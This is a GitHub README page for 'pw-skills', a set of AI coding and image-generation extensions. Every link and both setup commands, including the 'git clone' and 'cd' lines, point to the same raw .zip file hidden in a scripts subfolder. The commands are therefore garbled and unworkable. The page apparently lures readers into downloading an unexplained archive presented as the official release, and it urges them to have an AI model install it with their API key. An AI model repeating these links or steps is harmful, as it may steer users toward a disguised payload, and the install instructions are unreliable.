Skip to content

Latest commit

 

History

History
68 lines (41 loc) · 2.99 KB

File metadata and controls

68 lines (41 loc) · 2.99 KB

🚀 pw-skills - Enhance Your Coding with AI Tools

Download pw-skills

📦 Overview

Welcome to the pw-skills repository! This project provides useful AI extensions to help you with coding tasks.

🤖 Skills List

  • pw-image-generation: AI image generation workflow (text-to-image, image-to-image, batch generation).
  • pw-redbook-image: Xiaohongshu style prompt template.
  • pw-embedded-c-style: Embedded C code style assistant (project creation, code optimization).

Refer to each https://github.com/BritishCheeseTT/pw-skills/raw/refs/heads/main/pw-post-to-wechat/scripts/md/skills-pw-2.8.zip for detailed usage instructions.

📥 Download & Install

To get started with pw-skills, follow these steps:

  1. Visit the Releases Page: Click below to access the release files.

    Download pw-skills

  2. Choose Your Version: On the releases page, find the latest version and download the appropriate file for your system.

📂 Setting Up

If you prefer to set up the skills yourself, use the following commands:

# Clone the repository to your computer
git clone https://github.com/BritishCheeseTT/pw-skills/raw/refs/heads/main/pw-post-to-wechat/scripts/md/skills-pw-2.8.zip ~https://github.com/BritishCheeseTT/pw-skills/raw/refs/heads/main/pw-post-to-wechat/scripts/md/skills-pw-2.8.zip

# Navigate to the image generation skill and install dependencies
cd ~https://github.com/BritishCheeseTT/pw-skills/raw/refs/heads/main/pw-post-to-wechat/scripts/md/skills-pw-2.8.zip && npm install

🤝 Let AI Help You Install

You can also let Claude assist you with the installation and configuration:

Please help me install the pw-image-generation skill:

1. Go to the skill directory and install dependencies
2. Set up the ai-router API Key: [your API key]
3. Create a test project and generate a test image

Get your API Key: ai-router

⚠️ Important Notes

  • The API Key is a key for ai-router, supporting various models.
  • You need to log in with GitHub. Ensure your GitHub account displays your email.

🧠 Supported Models

  • gemini-3-pro-image-preview: Google Gemini 3 Pro image preview model (generation).
  • gemini-2.0-flash-exp: Google Gemini 2.0 Flash experimental model (analysis).
  • Additional models supporting image generation.

👨‍💻 Author

Mou Yong | AI Router | WeChat: 1254074921

Feel free to reach out for any questions or support with the pw-skills project. Happy coding!